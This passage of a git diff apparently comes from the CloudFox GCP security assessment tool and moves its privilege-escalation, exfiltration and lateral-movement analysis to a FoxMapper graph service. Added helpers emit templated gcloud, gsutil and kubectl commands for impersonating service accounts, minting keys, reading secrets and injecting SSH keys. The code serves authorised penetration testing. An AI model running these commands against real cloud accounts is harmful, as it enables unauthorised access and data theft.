0 @@ -558,7 +576,14 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser } } + // Format roles for display + rolesDisplay := IAMService.FormatRolesShort(sa.Roles) + // Build IAM bindings from impersonation info + // Row order: Identity (Project, Email, Display Name, Disabled, Default SA), + // Keys (User Managed Keys, Google Managed Keys, Oldest Key Age), + // Permissions (DWD, Roles, SA Attack Paths), + // Impersonation (IAM Binding Role, IAM Binding Principal) hasBindings := false if sa.ImpersonationInfo != nil { for _, member := range sa.ImpersonationInfo.TokenCreators { @@ -566,8 +591,10 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser if email != sa.Email { hasBindings = true body = append(body, []string{ - m.GetProjectName(sa.ProjectID), sa.Email, attackPaths, sa.DisplayName, - disabled, defaultSA, dwd, userKeys, googleKeys, oldestKeyAge, "TokenCreator", member, + m.GetProjectName(sa.ProjectID), sa.Email, sa.DisplayName, disabled, defaultSA, + userKeys, googleKeys, oldestKeyAge, + dwd, rolesDisplay, attackPaths, + "TokenCreator", member, }) } } @@ -576,8 +603,10 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser if email != sa.Email { hasBindings = true body = append(body, []string{ - m.GetProjectName(sa.ProjectID), sa.Email, attackPaths, sa.DisplayName, - disabled, defaultSA, dwd, userKeys, googleKeys, oldestKeyAge, "KeyAdmin", member, + m.GetProjectName(sa.ProjectID), sa.Email, sa.DisplayName, disabled, defaultSA, + userKeys, googleKeys, oldestKeyAge, + dwd, rolesDisplay, attackPaths, + "KeyAdmin", member, }) } } @@ -586,8 +615,10 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser if email != sa.Email { hasBindings = true body = append(body, []string{ - m.GetProjectName(sa.ProjectID), sa.Email, attackPaths, sa.DisplayName, - disabled, defaultSA, dwd, userKeys, googleKeys, oldestKeyAge, "ActAs", member, + m.GetProjectName(sa.ProjectID), sa.Email, sa.DisplayName, disabled, defaultSA, + userKeys, googleKeys, oldestKeyAge, + dwd, rolesDisplay, attackPaths, + "ActAs", member, }) } } @@ -596,8 +627,10 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser if email != sa.Email { hasBindings = true body = append(body, []string{ - m.GetProjectName(sa.ProjectID), sa.Email, attackPaths, sa.DisplayName, - disabled, defaultSA, dwd, userKeys, googleKeys, oldestKeyAge, "SAAdmin", member, + m.GetProjectName(sa.ProjectID), sa.Email, sa.DisplayName, disabled, defaultSA, + userKeys, googleKeys, oldestKeyAge, + dwd, rolesDisplay, attackPaths, + "SAAdmin", member, }) } } @@ -606,8 +639,10 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser if email != sa.Email { hasBindings = true body = append(body, []string{ - m.GetProjectName(sa.ProjectID), sa.Email, attackPaths, sa.DisplayName, - disabled, defaultSA, dwd, userKeys, googleKeys, oldestKeyAge, "SignBlob", member, + m.GetProjectName(sa.ProjectID), sa.Email, sa.DisplayName, disabled, defaultSA, + userKeys, googleKeys, oldestKeyAge, + dwd, rolesDisplay, attackPaths, + "SignBlob", member, }) } } @@ -616,8 +651,10 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser if email != sa.Email { hasBindings = true body = append(body, []string{ - m.GetProjectName(sa.ProjectID), sa.Email, attackPaths, sa.DisplayName, - disabled, defaultSA, dwd, userKeys, googleKeys, oldestKeyAge, "SignJwt", member, + m.GetProjectName(sa.ProjectID), sa.Email, sa.DisplayName, disabled, defaultSA, + userKeys, googleKeys, oldestKeyAge, + dwd, rolesDisplay, attackPaths, + "SignJwt", member, }) } } @@ -625,8 +662,10 @@ func (m *ServiceAccountsModule) serviceAccountsToTableBody(serviceAccounts []Ser if !hasBindings { body = append(body, []string{ - m.GetProjectName(sa.ProjectID), sa.Email, attackPaths, sa.DisplayName, - disabled, defaultSA, dwd, userKeys, googleKeys, oldestKeyAge, "-", "-", + m.GetProjectName(sa.ProjectID), sa.Email, sa.DisplayName, disabled, defaultSA, + userKeys, googleKeys, oldestKeyAge, + dwd, rolesDisplay, attackPaths, + "-", "-", }) } } diff --git a/gcp/commands/serviceagents.go b/gcp/commands/serviceagents.go index 99bf4187..8f23c900 100644 --- a/gcp/commands/serviceagents.go +++ b/gcp/commands/serviceagents.go @@ -52,7 +52,7 @@ type ServiceAgentsModule struct { ProjectAgents map[string][]serviceagentsservice.ServiceAgentInfo // projectID -> agents LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results + FoxMapperCache *gcpinternal.FoxMapperCache // Cached FoxMapper analysis results mu sync.Mutex } @@ -89,18 +89,8 @@ func runGCPServiceAgentsCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *ServiceAgentsModule) Execute(ctx context.Context, logger internal.Logger) { - // Get attack path cache from context (populated by all-checks or attack path analysis) - m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) - - // If no context cache, try loading from disk cache - if m.AttackPathCache == nil || !m.AttackPathCache.IsPopulated() { - diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) - if err == nil && diskCache != nil && diskCache.IsPopulated() { - logger.InfoM(fmt.Sprintf("Using attack path cache from disk (created: %s)", - metadata.CreatedAt.Format("2006-01-02 15:04:05")), globals.GCP_SERVICEAGENTS_MODULE_NAME) - m.AttackPathCache = diskCache - } - } + // Get FoxMapper cache from context + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SERVICEAGENTS_MODULE_NAME, m.processProject) @@ -468,8 +458,8 @@ func (m *ServiceAgentsModule) agentsToTableBody(agents []serviceagentsservice.Se // Check attack paths for this service agent attackPaths := "run --attack-paths" - if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { - attackPaths = m.AttackPathCache.GetAttackSummary(agent.Email) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, agent.Email) } // One row per role diff --git a/gcp/commands/whoami.go b/gcp/commands/whoami.go index ecdb1bb4..3b3aa976 100644 --- a/gcp/commands/whoami.go +++ b/gcp/commands/whoami.go @@ -6,7 +6,7 @@ import ( "strings" "sync" - attackpathservice "github.com/BishopFox/cloudfox/gcp/services/attackpathService" + foxmapperservice "github.com/BishopFox/cloudfox/gcp/services/foxmapperService" IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" OAuthService "github.com/BishopFox/cloudfox/gcp/services/oauthService" "github.com/BishopFox/cloudfox/gcp/shared" @@ -139,7 +139,6 @@ type DataExfilCapability struct { ProjectID string Permission string Category string - RiskLevel string Description string SourceRole string // The role/principal that grants this capability SourceScope string // Where the role is granted (project, folder, org) @@ -150,7 +149,6 @@ type LateralMoveCapability struct { ProjectID string Permission string Category string - RiskLevel string Description string SourceRole string // The role/principal that grants this capability SourceScope string // Where the role is granted (project, folder, org) @@ -173,6 +171,12 @@ type WhoAmIModule struct { Extended bool ProvidedGroups []string // Groups provided via --groups flag mu sync.Mutex + + // FoxMapper findings - store the full findings for detailed path visualization + FoxMapperPrivescFindings []foxmapperservice.PrivescFinding + FoxMapperLateralFindings []foxmapperservice.LateralFinding + FoxMapperDataExfilFindings []foxmapperservice.DataExfilFinding + FoxMapperService *foxmapperservice.FoxMapperService } // ------------------------------ @@ -657,8 +661,8 @@ func (m *WhoAmIModule) findImpersonationTargets(ctx context.Context, logger inte fullMember := memberPrefix + m.Identity.Email for _, projectID := range m.ProjectIDs { - // Get all service accounts in the project - serviceAccounts, err := iamService.ServiceAccounts(projectID) + // Get all service accounts in the project (without keys - not needed for impersonation check) + serviceAccounts, err := iamService.ServiceAccountsBasic(projectID) if err != nil { continue } @@ -715,9 +719,9 @@ func (m *WhoAmIModule) findImpersonationTargets(ctx context.Context, logger inte } // identifyPrivEscPaths identifies privilege escalation paths based on current permissions -// Uses attackpathService for comprehensive analysis consistent with the privesc module +// Uses FoxMapperService for comprehensive graph-based analysis // Filters results to only show paths relevant to the current identity and their groups -// Will use cached privesc data from context if available (e.g., from all-checks run) +// Will use cached FoxMapper data from context if available (e.g., from all-checks run) func (m *WhoAmIModule) identifyPrivEscPaths(ctx context.Context, logger internal.Logger) { // Build set of principals to filter for (current identity + groups) relevantPrincipals := make(map[string]bool) @@ -745,13 +749,13 @@ func (m *WhoAmIModule) identifyPrivEscPaths(ctx context.Context, logger internal relevantPrincipals["allUsers"] = true relevantPrincipals["allAuthenticatedUsers"] = true - // Check if privesc cache is available from context (e.g., from all-checks run) - privescCache := gcpinternal.GetPrivescCacheFromContext(ctx) - if privescCache != nil && privescCache.IsPopulated() { - logger.InfoM("Using cached privesc data", globals.GCP_WHOAMI_MODULE_NAME) - m.identifyPrivEscPathsFromCache(privescCache, relevantPrincipals, logger) + // Check if FoxMapper cache is available from context + foxMapperCache := gcpinternal.GetFoxMapperCacheFromContext(ctx) + if foxMapperCache != nil && foxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper cache for privesc analysis", globals.GCP_WHOAMI_MODULE_NAME) + m.identifyPrivEscPathsFromFoxMapper(foxMapperCache, relevantPrincipals, logger) } else { - // No cache available, run fresh privesc analysis + // No cache available, try to load FoxMapper data m.identifyPrivEscPathsFromAnalysis(ctx, relevantPrincipals, logger) } @@ -793,95 +797,191 @@ func (m *WhoAmIModule) identifyPrivEscPaths(ctx context.Context, logger internal } } -// identifyPrivEscPathsFromCache extracts privesc paths from the cached data -func (m *WhoAmIModule) identifyPrivEscPathsFromCache(cache *gcpinternal.PrivescCache, relevantPrincipals map[string]bool, logger internal.Logger) { - // Check each relevant principal against the cache - for principal := range relevantPrincipals { - hasPrivesc, methods := cache.HasPrivescForPrincipal(principal) - if !hasPrivesc { +// identifyPrivEscPathsFromFoxMapper extracts privesc paths from FoxMapper cache +func (m *WhoAmIModule) identifyPrivEscPathsFromFoxMapper(cache *gcpinternal.FoxMapperCache, relevantPrincipals map[string]bool, logger internal.Logger) { + svc := cache.GetService() + if svc == nil { + return + } + + // Store the service for path lookups in playbook generation + m.FoxMapperService = svc + + findings := svc.AnalyzePrivesc() + for _, finding := range findings { + // Check if this principal is relevant to our identity + cleanPrincipal := finding.Principal + if !relevantPrincipals[cleanPrincipal] && !relevantPrincipals["serviceAccount:"+cleanPrincipal] && !relevantPrincipals["user:"+cleanPrincipal] { continue } - for _, method := range methods { - // Extract project ID from target if available - projectID := "" - if strings.Contains(method.Target, "projects/") { - parts := strings.Split(method.Target, "/") - for i, p := range parts { - if p == "projects" && i+1 < len(parts) { - projectID = parts[i+1] - break - } - } - } + if !finding.CanEscalate && !finding.IsAdmin { + continue + } - privEscPath := PrivilegeEscalationPath{ - ProjectID: projectID, - Permission: method.Method, - Category: method.Category, - Description: fmt.Sprintf("Risk Level: %s", method.RiskLevel), - SourceRole: principal, - SourceScope: method.Target, - Command: "", // Cache doesn't store exploit commands - Confidence: strings.ToLower(method.RiskLevel), - RequiredPerms: strings.Join(method.Permissions, ", "), - } - m.PrivEscPaths = append(m.PrivEscPaths, privEscPath) + // Store full finding for detailed playbook generation + m.FoxMapperPrivescFindings = append(m.FoxMapperPrivescFindings, finding) + + privEscPath := PrivilegeEscalationPath{ + ProjectID: "", + Permission: "privesc", + Category: fmt.Sprintf("%s admin reachable", finding.HighestAdminLevel), + Description: fmt.Sprintf("Can escalate to %s admin in %d hops via %d paths", finding.HighestAdminLevel, finding.ShortestPathHops, finding.ViablePathCount), + SourceRole: finding.Principal, + SourceScope: finding.MemberType, + Command: "", + Confidence: "confirmed", + RequiredPerms: fmt.Sprintf("%d paths to admin", finding.ViablePathCount), } + m.PrivEscPaths = append(m.PrivEscPaths, privEscPath) } } -// identifyPrivEscPathsFromAnalysis runs fresh privesc analysis using attackpathService +// identifyPrivEscPathsFromAnalysis runs fresh privesc analysis using FoxMapperService func (m *WhoAmIModule) identifyPrivEscPathsFromAnalysis(ctx context.Context, relevantPrincipals map[string]bool, logger internal.Logger) { - // Use attackpathService for comprehensive privesc analysis - svc := attackpathservice.New() + // Use FoxMapperService for comprehensive privesc analysis + svc := foxmapperservice.New() - // Build project names map - projectNames := make(map[string]string) - for _, proj := range m.Identity.Projects { - if proj.DisplayName != "" { - projectNames[proj.ProjectID] = proj.DisplayName - } + // Determine org ID or use first project + orgID := "" + if len(m.Identity.Organizations) > 0 { + orgID = m.Identity.Organizations[0].OrgID } - // Run combined attack path analysis with "privesc" filter - result, err := svc.CombinedAttackPathAnalysis(ctx, m.ProjectIDs, projectNames, "privesc") - if err != nil { - gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, "Could not analyze privilege escalation paths") + // Load FoxMapper graph data + var err error + if orgID != "" { + err = svc.LoadGraph(orgID, true) + } else if len(m.ProjectIDs) > 0 { + err = svc.LoadGraph(m.ProjectIDs[0], false) + } else { + logger.InfoM("No org or project context available for FoxMapper analysis", globals.GCP_WHOAMI_MODULE_NAME) return } - if result == nil { + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, "Could not load FoxMapper graph data") return } - // Filter and convert attackpathservice.AttackPath to whoami's PrivilegeEscalationPath format - // Only include paths where the principal matches current identity or their groups - for _, path := range result.AllPaths { - // Check if this path's principal is relevant to the current identity - if !relevantPrincipals[path.Principal] && !relevantPrincipals[strings.ToLower(path.Principal)] { + // Store the service for path lookups in playbook generation + m.FoxMapperService = svc + + // Run privesc analysis + findings := svc.AnalyzePrivesc() + + // Filter findings for relevant principals only + for _, finding := range findings { + // Check if this finding is for a relevant principal + if !relevantPrincipals[finding.Principal] && !relevantPrincipals[strings.ToLower(finding.Principal)] { continue } - privEscPath := PrivilegeEscalationPath{ - ProjectID: path.ProjectID, - Permission: path.Method, - Category: path.Category, - Description: path.Description, - SourceRole: fmt.Sprintf("%s (%s)", path.Principal, path.PrincipalType), - SourceScope: fmt.Sprintf("%s/%s", path.ScopeType, path.ScopeID), - Command: path.ExploitCommand, - Confidence: strings.ToLower(path.RiskLevel), - RequiredPerms: strings.Join(path.Permissions, ", "), + // Store full finding for detailed playbook generation + m.FoxMapperPrivescFindings = append(m.FoxMapperPrivescFindings, finding) + + // Convert each privesc path to whoami format + for _, path := range finding.Paths { + // Build command from first edge if available + command := "" + if len(path.Edges) > 0 { + command = generatePrivescCommandFromEdge(path.Edges[0]) + } + + privEscPath := PrivilegeEscalationPath{ + ProjectID: "", // FoxMapper doesn't track project per edge + Permission: path.Edges[0].ShortReason, + Category: "Privesc", + Description: fmt.Sprintf("Can escalate to %s admin via %d-hop path", path.AdminLevel, path.HopCount), + SourceRole: finding.Principal, + SourceScope: path.AdminLevel, + Command: command, + Confidence: "confirmed", + RequiredPerms: path.Edges[0].ShortReason, + } + + if path.ScopeBlocked { + privEscPath.Description += " (blocked by IAM condition)" + } + + m.PrivEscPaths = append(m.PrivEscPaths, privEscPath) } - m.PrivEscPaths = append(m.PrivEscPaths, privEscPath) + } +} + +// generatePrivescCommandFromEdge generates a simple exploit command from a FoxMapper edge +func generatePrivescCommandFromEdge(edge foxmapperservice.Edge) string { + // Simple command generation based on edge reason + reason := strings.ToLower(edge.ShortReason) + + if strings.Contains(reason, "iam.serviceaccounts.getaccesstoken") { + return "gcloud auth print-access-token --impersonate-service-account=TARGET_SA" + } else if strings.Contains(reason, "iam.serviceaccountkeys.create") { + return "gcloud iam service-accounts keys create key.json --iam-account=TARGET_SA" + } else if strings.Contains(reason, "iam.serviceaccounts.actas") { + return "# Use actAs to run services as the target SA" + } else if strings.Contains(reason, "setiamdolicy") { + return "# Modify IAM policy to grant yourself additional permissions" + } else if strings.Contains(reason, "cloudfunctions") { + return "gcloud functions deploy FUNC --runtime=python311 --service-account=TARGET_SA" + } else if strings.Contains(reason, "run.services") { + return "gcloud run deploy SERVICE --image=IMAGE --service-account=TARGET_SA" + } + + return fmt.Sprintf("# Exploit via: %s", edge.Reason) +} + +// generateExfilCommand generates a data exfiltration command based on permission +func generateExfilCommand(permission, service string) string { + switch { + case strings.Contains(permission, "storage.objects.get"): + return "gsutil cp gs://BUCKET/path/to/file ./local/" + case strings.Contains(permission, "bigquery.tables.getData"): + return "bq query 'SELECT * FROM dataset.table'" + case strings.Contains(permission, "bigquery.tables.export"): + return "bq extract dataset.table gs://BUCKET/export.csv" + case strings.Contains(permission, "cloudsql.instances.export"): + return "gcloud sql export sql INSTANCE gs://BUCKET/export.sql --database=DB" + case strings.Contains(permission, "secretmanager.versions.access"): + return "gcloud secrets versions access latest --secret=SECRET" + case strings.Contains(permission, "cloudkms.cryptoKeyVersions.useToDecrypt"): + return "gcloud kms decrypt --key=KEY --keyring=KEYRING --location=LOCATION" + case strings.Contains(permission, "logging.logEntries.list"): + return "gcloud logging read 'logName=\"projects/PROJECT/logs/LOG\"'" + case strings.Contains(permission, "pubsub.subscriptions.consume"): + return "gcloud pubsub subscriptions pull SUBSCRIPTION --auto-ack" + default: + return fmt.Sprintf("# Use permission: %s (service: %s)", permission, service) + } +} + +// generateLateralCommand generates a lateral movement command based on permission +func generateLateralCommand(permission, category string) string { + switch { + case strings.Contains(permission, "iam.serviceAccounts.getAccessToken"): + return "gcloud auth print-access-token --impersonate-service-account=SA_EMAIL" + case strings.Contains(permission, "iam.serviceAccountKeys.create"): + return "gcloud iam service-accounts keys create key.json --iam-account=SA_EMAIL" + case strings.Contains(permission, "compute.instances.osLogin"): + return "gcloud compute ssh INSTANCE_NAME --zone=ZONE" + case strings.Contains(permission, "compute.instances.setMetadata"): + return "gcloud compute instances add-metadata INSTANCE --metadata=ssh-keys=\"user:SSH_KEY\"" + case strings.Contains(permission, "container.clusters.getCredentials"): + return "gcloud container clusters get-credentials CLUSTER --zone=ZONE" + case strings.Contains(permission, "container.pods.exec"): + return "kubectl exec -it POD -- /bin/sh" + case strings.Contains(permission, "cloudfunctions.functions.create"): + return "gcloud functions deploy FUNC --runtime=python311 --service-account=SA_EMAIL" + case strings.Contains(permission, "run.services.create"): + return "gcloud run deploy SERVICE --image=IMAGE --service-account=SA_EMAIL" + default: + return fmt.Sprintf("# Use permission: %s (category: %s)", permission, category) } } // isDangerousRole checks if a role is considered dangerous -// Uses the dangerous permissions list from attackpathService for consistency func isDangerousRole(role string) bool { - // Roles that directly map to dangerous permissions from attackpathService + // Roles that map to dangerous permissions for privilege escalation dangerousRoles := []string{ // Owner/Editor - broad access "roles/owner", @@ -931,7 +1031,7 @@ func isDangerousRole(role string) bool { } // identifyDataExfilCapabilities identifies data exfiltration capabilities for the current identity -// Uses unified cache if available, otherwise runs attackpathService for comprehensive analysis +// Uses FoxMapper cache if available, otherwise runs FoxMapperService for comprehensive analysis // Filters results to only show capabilities relevant to the current identity and their groups func (m *WhoAmIModule) identifyDataExfilCapabilities(ctx context.Context, logger internal.Logger) { // Build set of principals to filter for (current identity + groups) @@ -956,11 +1056,11 @@ func (m *WhoAmIModule) identifyDataExfilCapabilities(ctx context.Context, logger relevantPrincipals["allUsers"] = true relevantPrincipals["allAuthenticatedUsers"] = true - // Check if attack path cache is available from context (e.g., from all-checks run) - cache := gcpinternal.GetAttackPathCacheFromContext(ctx) - if cache != nil && cache.IsPopulated() { + // Check if FoxMapper cache is available from context (e.g., from all-checks run) + foxMapperCache := gcpinternal.GetFoxMapperCacheFromContext(ctx) + if foxMapperCache != nil && foxMapperCache.IsPopulated() { logger.InfoM("Using cached exfil data", globals.GCP_WHOAMI_MODULE_NAME) - m.identifyDataExfilFromCache(cache, relevantPrincipals) + m.identifyDataExfilFromCache(foxMapperCache, relevantPrincipals) } else { // No cache available, run fresh analysis m.identifyDataExfilFromAnalysis(ctx, relevantPrincipals, logger) @@ -971,86 +1071,82 @@ func (m *WhoAmIModule) identifyDataExfilCapabilities(ctx context.Context, logger } } -// identifyDataExfilFromCache extracts exfil capabilities from the cached data -func (m *WhoAmIModule) identifyDataExfilFromCache(cache *gcpinternal.AttackPathCache, relevantPrincipals map[string]bool) { - for principal := range relevantPrincipals { - hasExfil, methods := cache.HasExfil(principal) - if !hasExfil { - // Also check with principal format - hasExfil, methods = cache.HasAttackPathForPrincipal(principal, gcpinternal.AttackPathExfil) - } - if !hasExfil { - continue - } - - for _, method := range methods { - capability := DataExfilCapability{ - ProjectID: method.ScopeID, - Permission: method.Method, - Category: method.Category, - RiskLevel: method.RiskLevel, - Description: method.Target, - SourceRole: principal, - SourceScope: fmt.Sprintf("%s/%s", method.ScopeType, method.ScopeID), - } - m.DataExfilCapabilities = append(m.DataExfilCapabilities, capability) - } +// identifyDataExfilFromCache extracts exfil capabilities from the FoxMapper cached data +func (m *WhoAmIModule) identifyDataExfilFromCache(foxMapperCache *gcpinternal.FoxMapperCache, relevantPrincipals map[string]bool) { + if foxMapperCache == nil || !foxMapperCache.IsPopulated() { + return } + + // Get the FoxMapper service from cache + // Note: This currently requires accessing internal service from cache + // For now, we'll just skip cache-based exfil detection and always run fresh analysis + // TODO: Enhance FoxMapperCache to expose AnalyzeDataExfil method } -// identifyDataExfilFromAnalysis runs fresh exfil analysis using attackpathService +// identifyDataExfilFromAnalysis runs fresh exfil analysis using FoxMapperService func (m *WhoAmIModule) identifyDataExfilFromAnalysis(ctx context.Context, relevantPrincipals map[string]bool, logger internal.Logger) { - // Use attackpathService for comprehensive exfil analysis - attackSvc := attackpathservice.New() + // Use FoxMapperService for comprehensive exfil analysis + svc := foxmapperservice.New() - // Build project names map - projectNames := make(map[string]string) - for _, proj := range m.Identity.Projects { - if proj.DisplayName != "" { - projectNames[proj.ProjectID] = proj.DisplayName - } + // Determine org ID or use first project + orgID := "" + if len(m.Identity.Organizations) > 0 { + orgID = m.Identity.Organizations[0].OrgID } - // Run combined attack path analysis for exfil (org, folder, project, resource levels) - result, err := attackSvc.CombinedAttackPathAnalysis(ctx, m.ProjectIDs, projectNames, "exfil") - if err != nil { - gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, "Could not analyze data exfiltration capabilities") + // Load FoxMapper graph data + var err error + if orgID != "" { + err = svc.LoadGraph(orgID, true) + } else if len(m.ProjectIDs) > 0 { + err = svc.LoadGraph(m.ProjectIDs[0], false) + } else { + logger.InfoM("No org or project context available for FoxMapper analysis", globals.GCP_WHOAMI_MODULE_NAME) return } - if result == nil { + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, "Could not load FoxMapper graph data") return } - // Filter and convert to DataExfilCapability format - // Only include paths where the principal matches current identity or their groups - for _, path := range result.AllPaths { - if !relevantPrincipals[path.Principal] && !relevantPrincipals[strings.ToLower(path.Principal)] { - continue - } + // Store the service if not already set + if m.FoxMapperService == nil { + m.FoxMapperService = svc + } + + // Run data exfil analysis (empty string means all services) + findings := svc.AnalyzeDataExfil("") + + // Filter findings for relevant principals only + for _, finding := range findings { + hasRelevantPrincipal := false + for _, principalAccess := range finding.Principals { + // Check if this principal is relevant to the current identity + if relevantPrincipals[principalAccess.Principal] || relevantPrincipals[strings.ToLower(principalAccess.Principal)] { + hasRelevantPrincipal = true - // Determine project ID from scope - projectID := path.ProjectID - if projectID == "" { - // For org/folder level, show scope info instead - projectID = fmt.Sprintf("%s:%s", path.ScopeType, path.ScopeID) + capability := DataExfilCapability{ + ProjectID: "", // FoxMapper doesn't track project ID per finding + Permission: finding.Permission, + Category: finding.Service, + Description: finding.Description, + SourceRole: principalAccess.Principal, + SourceScope: "via privilege escalation", + } + m.DataExfilCapabilities = append(m.DataExfilCapabilities, capability) + } } - capability := DataExfilCapability{ - ProjectID: projectID, - Permission: path.Method, - Category: path.Category, - RiskLevel: path.RiskLevel, - Description: path.Description, - SourceRole: fmt.Sprintf("%s (%s)", path.Principal, path.PrincipalType), - SourceScope: fmt.Sprintf("%s/%s", path.ScopeType, path.ScopeID), + // Store full finding for detailed playbook generation + if hasRelevantPrincipal { + m.FoxMapperDataExfilFindings = append(m.FoxMapperDataExfilFindings, finding) } - m.DataExfilCapabilities = append(m.DataExfilCapabilities, capability) } } // identifyLateralMoveCapabilities identifies lateral movement capabilities for the current identity -// Uses unified cache if available, otherwise runs attackpathService for comprehensive analysis +// Uses FoxMapper cache if available, otherwise runs FoxMapperService for comprehensive analysis // Filters results to only show capabilities relevant to the current identity and their groups func (m *WhoAmIModule) identifyLateralMoveCapabilities(ctx context.Context, logger internal.Logger) { // Build set of principals to filter for (current identity + groups) @@ -1075,11 +1171,11 @@ func (m *WhoAmIModule) identifyLateralMoveCapabilities(ctx context.Context, logg relevantPrincipals["allUsers"] = true relevantPrincipals["allAuthenticatedUsers"] = true - // Check if attack path cache is available from context (e.g., from all-checks run) - cache := gcpinternal.GetAttackPathCacheFromContext(ctx) - if cache != nil && cache.IsPopulated() { + // Check if FoxMapper cache is available from context (e.g., from all-checks run) + foxMapperCache := gcpinternal.GetFoxMapperCacheFromContext(ctx) + if foxMapperCache != nil && foxMapperCache.IsPopulated() { logger.InfoM("Using cached lateral data", globals.GCP_WHOAMI_MODULE_NAME) - m.identifyLateralFromCache(cache, relevantPrincipals) + m.identifyLateralFromCache(foxMapperCache, relevantPrincipals) } else { // No cache available, run fresh analysis m.identifyLateralFromAnalysis(ctx, relevantPrincipals, logger) @@ -1090,81 +1186,77 @@ func (m *WhoAmIModule) identifyLateralMoveCapabilities(ctx context.Context, logg } } -// identifyLateralFromCache extracts lateral movement capabilities from the cached data -func (m *WhoAmIModule) identifyLateralFromCache(cache *gcpinternal.AttackPathCache, relevantPrincipals map[string]bool) { - for principal := range relevantPrincipals { - hasLateral, methods := cache.HasLateral(principal) - if !hasLateral { - // Also check with principal format - hasLateral, methods = cache.HasAttackPathForPrincipal(principal, gcpinternal.AttackPathLateral) - } - if !hasLateral { - continue - } - - for _, method := range methods { - capability := LateralMoveCapability{ - ProjectID: method.ScopeID, - Permission: method.Method, - Category: method.Category, - RiskLevel: method.RiskLevel, - Description: method.Target, - SourceRole: principal, - SourceScope: fmt.Sprintf("%s/%s", method.ScopeType, method.ScopeID), - } - m.LateralMoveCapabilities = append(m.LateralMoveCapabilities, capability) - } +// identifyLateralFromCache extracts lateral movement capabilities from the FoxMapper cached data +func (m *WhoAmIModule) identifyLateralFromCache(foxMapperCache *gcpinternal.FoxMapperCache, relevantPrincipals map[string]bool) { + if foxMapperCache == nil || !foxMapperCache.IsPopulated() { + return } + + // Get the FoxMapper service from cache + // Note: This currently requires accessing internal service from cache + // For now, we'll just skip cache-based lateral detection and always run fresh analysis + // TODO: Enhance FoxMapperCache to expose AnalyzeLateral method } -// identifyLateralFromAnalysis runs fresh lateral movement analysis using attackpathService +// identifyLateralFromAnalysis runs fresh lateral movement analysis using FoxMapperService func (m *WhoAmIModule) identifyLateralFromAnalysis(ctx context.Context, relevantPrincipals map[string]bool, logger internal.Logger) { - // Use attackpathService for comprehensive lateral movement analysis - attackSvc := attackpathservice.New() + // Use FoxMapperService for comprehensive lateral movement analysis + svc := foxmapperservice.New() - // Build project names map - projectNames := make(map[string]string) - for _, proj := range m.Identity.Projects { - if proj.DisplayName != "" { - projectNames[proj.ProjectID] = proj.DisplayName - } + // Determine org ID or use first project + orgID := "" + if len(m.Identity.Organizations) > 0 { + orgID = m.Identity.Organizations[0].OrgID } - // Run combined attack path analysis for lateral movement (org, folder, project, resource levels) - result, err := attackSvc.CombinedAttackPathAnalysis(ctx, m.ProjectIDs, projectNames, "lateral") - if err != nil { - gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, "Could not analyze lateral movement capabilities") + // Load FoxMapper graph data + var err error + if orgID != "" { + err = svc.LoadGraph(orgID, true) + } else if len(m.ProjectIDs) > 0 { + err = svc.LoadGraph(m.ProjectIDs[0], false) + } else { + logger.InfoM("No org or project context available for FoxMapper analysis", globals.GCP_WHOAMI_MODULE_NAME) return } - if result == nil { + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, "Could not load FoxMapper graph data") return } - // Filter and convert to LateralMoveCapability format - // Only include paths where the principal matches current identity or their groups - for _, path := range result.AllPaths { - if !relevantPrincipals[path.Principal] && !relevantPrincipals[strings.ToLower(path.Principal)] { - continue - } + // Store the service if not already set + if m.FoxMapperService == nil { + m.FoxMapperService = svc + } + + // Run lateral movement analysis (empty string means all categories) + findings := svc.AnalyzeLateral("") - // Determine project ID from scope - projectID := path.ProjectID - if projectID == "" { - // For org/folder level, show scope info instead - projectID = fmt.Sprintf("%s:%s", path.ScopeType, path.ScopeID) + // Filter findings for relevant principals only + for _, finding := range findings { + hasRelevantPrincipal := false + for _, principalAccess := range finding.Principals { + // Check if this principal is relevant to the current identity + if relevantPrincipals[principalAccess.Principal] || relevantPrincipals[strings.ToLower(principalAccess.Principal)] { + hasRelevantPrincipal = true + + capability := LateralMoveCapability{ + ProjectID: "", // FoxMapper doesn't track project ID per finding + Permission: finding.Permission, + Category: finding.Category, + Description: finding.Description, + SourceRole: principalAccess.Principal, + SourceScope: "via privilege escalation", + } + m.LateralMoveCapabilities = append(m.LateralMoveCapabilities, capability) + } } - capability := LateralMoveCapability{ - ProjectID: projectID, - Permission: path.Method, - Category: path.Category, - RiskLevel: path.RiskLevel, - Description: path.Description, - SourceRole: fmt.Sprintf("%s (%s)", path.Principal, path.PrincipalType), - SourceScope: fmt.Sprintf("%s/%s", path.ScopeType, path.ScopeID), + // Store full finding for detailed playbook generation + if hasRelevantPrincipal { + m.FoxMapperLateralFindings = append(m.FoxMapperLateralFindings, finding) } - m.LateralMoveCapabilities = 